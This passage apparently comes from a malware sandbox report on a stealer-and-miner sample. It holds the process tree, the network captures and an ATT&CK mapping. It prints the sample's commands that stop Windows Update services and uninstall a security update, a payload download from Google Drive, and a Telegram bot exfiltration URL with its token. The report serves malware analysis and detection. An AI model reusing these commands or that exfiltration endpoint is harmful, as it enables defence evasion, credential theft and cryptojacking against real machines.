  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4152
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4072
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2112
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2028
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3312
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4468
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4464
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3040
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4476
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1384
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:760
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4980
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:2188

Network

DNS

drive.usercontent.google.com

powershell.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

142.250.179.225
GET

https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

powershell.exe

Remote address:

142.250.179.225:443

Request

GET /u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download HTTP/1.1
Host: drive.usercontent.google.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 23 Jun 2024 13:06:39 GMT
Location: https://drive.usercontent.google.com/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-b41rB-zrKDUk2kyyB44G1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
GET

https://drive.usercontent.google.com/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

powershell.exe

Remote address:

142.250.179.225:443

Request

GET /uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download HTTP/1.1
Host: drive.usercontent.google.com

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sun, 23 Jun 2024 13:06:40 GMT
Location: https://drive.usercontent.google.com/download?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-wwhiDAM51uTevyQ0sYN4WA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
GET

https://drive.usercontent.google.com/download?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

powershell.exe

Remote address:

142.250.179.225:443

Request

GET /download?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download HTTP/1.1
Host: drive.usercontent.google.com

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="Cache.rar"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 2457518
Last-Modified: Sat, 22 Jun 2024 14:24:39 GMT
X-GUploader-UploadID: ACJd0NrmIp7702cMNYoULNNQyxslilzaQOnH4msKyJDQXsASx61inUWRgKlgBHth8dWfr9WEK6Y
Date: Sun, 23 Jun 2024 13:06:40 GMT
Expires: Sun, 23 Jun 2024 13:06:40 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=yqG8hA==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

225.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.179.250.142.in-addr.arpa

IN PTR

Response

225.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f11e100net
DNS

get.geojs.io

RegAsm.exe

Remote address:

8.8.8.8:53

Request

get.geojs.io

IN A

Response

get.geojs.io

IN A

104.26.0.100

get.geojs.io

IN A

172.67.70.233

get.geojs.io

IN A

104.26.1.100
GET

https://get.geojs.io/v1/ip/geo.json

RegAsm.exe

Remote address:

104.26.0.100:443

Request

GET /v1/ip/geo.json HTTP/1.1
Host: get.geojs.io
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 23 Jun 2024 13:06:43 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
x-request-id: df7105bdc005b4f9765004a412c8339e-AMS
strict-transport-security: max-age=15552000; includeSubDomains; preload
access-control-allow-origin: *
access-control-allow-methods: GET
pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, private, max-age=0
x-geojs-location: AMS
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sYVX9Ca5819d9fInOdN97ZRmxI19IwlAAOE0Za9YT%2Bip9XtQJIZ8lrKZzk6AlX3OgQL7o3PB6%2FmXgx2iZR3GvjpPnAHyiAd%2FRIuVPPjGjOA42G22bLBUhvuLVkcBuw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8984b26e6f2e954b-LHR
alt-svc: h3=":443"; ma=86400
DNS

100.0.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

100.0.26.104.in-addr.arpa

IN PTR

Response
DNS

api.telegram.org

RegAsm.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
POST

https://api.telegram.org/bot7274515778:AAEx4SxiDLjUG8dht4Cac1HVmxqTSwD_yL4/sendDocument

RegAsm.exe

Remote address:

149.154.167.220:443

Request

POST /bot7274515778:AAEx4SxiDLjUG8dht4Cac1HVmxqTSwD_yL4/sendDocument HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
Content-Type: multipart/form-data; boundary=----------------------------8dc9385530e07b8
Host: api.telegram.org
Content-Length: 206096
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 23 Jun 2024 13:06:47 GMT
Content-Type: application/json
Content-Length: 705
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

pool.hashvault.pro

svchost.exe

Remote address:

8.8.8.8:53

Request

pool.hashvault.pro

IN A

Response

pool.hashvault.pro

IN A

95.179.241.203

pool.hashvault.pro

IN A

45.76.89.70
DNS

70.89.76.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

70.89.76.45.in-addr.arpa

IN PTR

Response

70.89.76.45.in-addr.arpa

IN PTR

45768970vultrusercontentcom
DNS

pastebin.com

svchost.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

104.20.3.235

pastebin.com

IN A

172.67.19.24

pastebin.com

IN A

104.20.4.235
DNS

235.3.20.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.3.20.104.in-addr.arpa

IN PTR

Response
DNS

203.241.179.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.241.179.95.in-addr.arpa

IN PTR

Response

203.241.179.95.in-addr.arpa

IN PTR

95179241203vultrusercontentcom

142.250.179.225:443

https://drive.usercontent.google.com/download?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

tls, http

powershell.exe

53.2kB
2.6MB
1075
1857

HTTP Request

GET https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

HTTP Response

302

HTTP Request

GET https://drive.usercontent.google.com/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

HTTP Response

303

HTTP Request

GET https://drive.usercontent.google.com/download?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

HTTP Response

200
104.26.0.100:443

https://get.geojs.io/v1/ip/geo.json

tls, http

RegAsm.exe

768 B
6.3kB
9
10

HTTP Request

GET https://get.geojs.io/v1/ip/geo.json

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot7274515778:AAEx4SxiDLjUG8dht4Cac1HVmxqTSwD_yL4/sendDocument

tls, http

RegAsm.exe

213.7kB
8.8kB
162
46

HTTP Request

POST https://api.telegram.org/bot7274515778:AAEx4SxiDLjUG8dht4Cac1HVmxqTSwD_yL4/sendDocument

HTTP Response

200
45.76.89.70:8888

pool.hashvault.pro

svchost.exe

879 B
1.1kB
6
4
104.20.3.235:443

pastebin.com

tls

svchost.exe

1.0kB
4.8kB
11
12
95.179.241.203:8888

pool.hashvault.pro

svchost.exe

1.1kB
2.8kB
8
7

8.8.8.8:53

drive.usercontent.google.com

dns

powershell.exe

74 B
90 B
1
1

DNS Request

drive.usercontent.google.com

DNS Response

142.250.179.225
8.8.8.8:53

225.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

225.179.250.142.in-addr.arpa
8.8.8.8:53

get.geojs.io

dns

RegAsm.exe

58 B
106 B
1
1

DNS Request

get.geojs.io

DNS Response

104.26.0.100

172.67.70.233

104.26.1.100
8.8.8.8:53

100.0.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

100.0.26.104.in-addr.arpa
8.8.8.8:53

api.telegram.org

dns

RegAsm.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

pool.hashvault.pro

dns

svchost.exe

64 B
96 B
1
1

DNS Request

pool.hashvault.pro

DNS Response

95.179.241.203

45.76.89.70
8.8.8.8:53

70.89.76.45.in-addr.arpa

dns

70 B
116 B
1
1

DNS Request

70.89.76.45.in-addr.arpa
8.8.8.8:53

pastebin.com

dns

svchost.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

104.20.3.235

172.67.19.24

104.20.4.235
8.8.8.8:53

235.3.20.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

235.3.20.104.in-addr.arpa
8.8.8.8:53

203.241.179.95.in-addr.arpa

dns

73 B
122 B
1
1

DNS Request

203.241.179.95.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
5d574dc518025fad52b7886c1bff0e13

SHA1
68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7

SHA256
755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2

SHA512
21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f134b81e645d3ff8ff8bae5b72f6b4ab

SHA1
30d57ea765d7cbc632c90a115b23db9a3c93055f

SHA256
e9b16760f2110783fd78f86836874575e34ed83dbb1fdef2b5c3e2aa32cf414a

SHA512
dfcf8eebfbbf99c96cf37a9099a257dd11650d58e72e0201a598106aaafab6aa312da323fac6667a6092f0c1faa1e9fc3572ca875012902f211cec5ffa9d1fbd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a1fb90b3f33474d62a2d3cef79aa6301

SHA1
f1ca0362b0575a908adc19ec92b22c3b5be30a3f

SHA256
96a0b42939fe583d920430996b4dc18f3a475a2fa534a02c86ff6b9309e61068

SHA512
0b312f78bf8effc86ea019f78e97340d4d8d71a7789813026e76b225892717b3de9b7a0aa1844072aefa6b45af7a3a4a7e6232c18f30a2fa4e63af61ca774c99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d5ecd9138710fa9e254da38a936dc8a6

SHA1
c89fe5235f27ca9517fedca5aa4bca419aaff98c

SHA256
c698ed5e40256e866801be707af25077f14b141202927a251a9509453b435416

SHA512
672389b8f0583c86035c86712217025ec30baa78df423f65b13e098879963755c9508c1a3d4e4b6dbe5d27fdae2b971c6bd7935a84e226fe34f90732b28f37ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
463102aaa11412dce1fa4e6f5f58986f

SHA1
962bb55bda97f82875c9e2e3e9c9d5c93e77aed7

SHA256
64354cc782f1b4d5aa45b416296ea0be23a164c4be716e0714f8c0ba9f0740b6

SHA512
9cf6a0c7d7b9237bf1b4a7b7f3cbf549ba41bbcccbd409f7f27658789ecb49969aa808126d4bfb5410b19c1341297469a9a702877d5394a9de9ae9080193540d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
37336a2069c23630c8deeba3c60a5ea3

SHA1
ed7a805a79ecf79d2479a6a9b0e61604dd7b6a28

SHA256
57389f5f93b1fc16c2b4b047091a4b6f80c51f805799842fe152ce95a0ef38db

SHA512
8087467e753b5b47589fa35c577cc7cafd6c3406ef3521110718cfcc1705ef0b676335095016b74cebb99a83723ca7a64741e8ca3e11b2d172d3d2015d871c02

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cache.rar

Filesize
2.3MB

MD5
6282b4c6aca3a1c55af6d1ed91d3c932

SHA1
cfb5bf824bbfd3ef9b49ef1f65c98f1f88c3a974

SHA256
a29cc0c6f3c244c8d257fa1ea5c10c463b4e26ef0f0ca010f0a917d7da69aee1

SHA512
92ac2ec23c1dd38b8b2a76ab237e30a0dd873d23aa2aaf7856089d451a95beb632b1417deea28fb6fb98fcc025afc3efcd9679e8c2384c4eefd5abbe27de28d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\kdotlbBcbF.bat

Filesize
193B

MD5
68f05d3d71ea50a777d0f47e0d78cac4

SHA1
248b8b5174d224c004a10267502f2601083ce1d5

SHA256
b8a9ea85d4dc8dfe89ffcff5c4ae7c33032de98064d7b06905938f05e212ec07

SHA512
225e95548435e43d90637cf7ef62252cabcafe94606f726c6f3e2858c82a264e72d22a3889d84a4111bf8a8954a10c306c54c14b6b4621d355f048fc35694dab

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe

Filesize
413KB

MD5
643a8e965f3f1331c2902a2a451c5200

SHA1
4a92181dc431a42e9a0c4aedb9df7c5b1b572173

SHA256
61c29cf71d338ee070804f4ec0e60f93dd2056840c95c9497bb03cf81a590ad5

SHA512
194f9c946d4d06bbe8a89999716024b79cd66df9da2c11e503cee216004e44fad01317229a84618a0cc406deb40ec7e23e1e53e23c426b2e6f2b3107e8f1baf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe

Filesize
2.6MB

MD5
acc0ec089c7623d1460d205a9e45a1d9

SHA1
7abdb88df37e63cdaf4b6c99d2ec9c56d48815f8

SHA256
169ab660aad03e63b1db2619e471ed8679a6975c7d1d23f639b1b052a62c80fc

SHA512
3201636fc8808dcf6683125555365dd0cbef25dfd5fe934c090eaf120107cee53a762a9ee0b2946f4feb1a74a7ee36a1daaae3187a15c278a2b00fc27b64c7e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hc3sabh5.xkf.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
4KB

MD5
747d7ddd27f695f5e07df8ff9bc44e28

SHA1
c33048412255744c3de6292238eae196791be25e

SHA256
8dac7d9b38f2811c76652717c7f93c2a6390f031149ed850ae9ddb7dedcfca55

SHA512
ca85efa05980bba8ced81cb41a66e05821a2a55382142bffd27e8945a34d0ec89a6e221f0f5e381c877adc8d639863c9c837b74401f8096af5e9417580766ffa

Download Submit
memory/2188-589-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-585-0x0000021FDB350000-0x0000021FDB370000-memory.dmp

Filesize
128KB

Download
memory/2188-594-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-593-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-580-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-581-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-586-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-587-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-588-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-578-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-582-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-583-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-584-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-579-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2188-590-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3828-369-0x00000000067F0000-0x0000000006CEE000-memory.dmp

Filesize
5.0MB

Download
memory/3828-366-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3828-367-0x0000000004DB0000-0x0000000004E16000-memory.dmp

Filesize
408KB

Download
memory/3828-368-0x00000000056D0000-0x0000000005762000-memory.dmp

Filesize
584KB

Download
memory/4056-72-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

Filesize
9.9MB

Download
memory/4056-54-0x000002C39CA90000-0x000002C39CB06000-memory.dmp

Filesize
472KB

Download
memory/4056-51-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

Filesize
9.9MB

Download
memory/4056-50-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

Filesize
9.9MB

Download
memory/4056-47-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp

Filesize
4KB

Download
memory/4056-49-0x000002C39C7E0000-0x000002C39C802000-memory.dmp

Filesize
136KB

Download
memory/4468-268-0x000001896FFE0000-0x0000018970002000-memory.dmp

Filesize
136KB

Download
memory/4468-249-0x000001896FFE0000-0x000001897000A000-memory.dmp

Filesize
168KB

Download
memory/4944-440-0x00000227AF510000-0x00000227AF52C000-memory.dmp

Filesize
112KB

Download
memory/4944-446-0x00000227AF6D0000-0x00000227AF789000-memory.dmp

Filesize
740KB

Download
memory/4944-479-0x00000227AF530000-0x00000227AF53A000-memory.dmp

Filesize
40KB

Download
memory/4980-577-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4980-570-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4980-571-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4980-572-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4980-573-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download
memory/4980-574-0x0000000140000000-0x000000014000D000-memory.dmp

Filesize
52KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.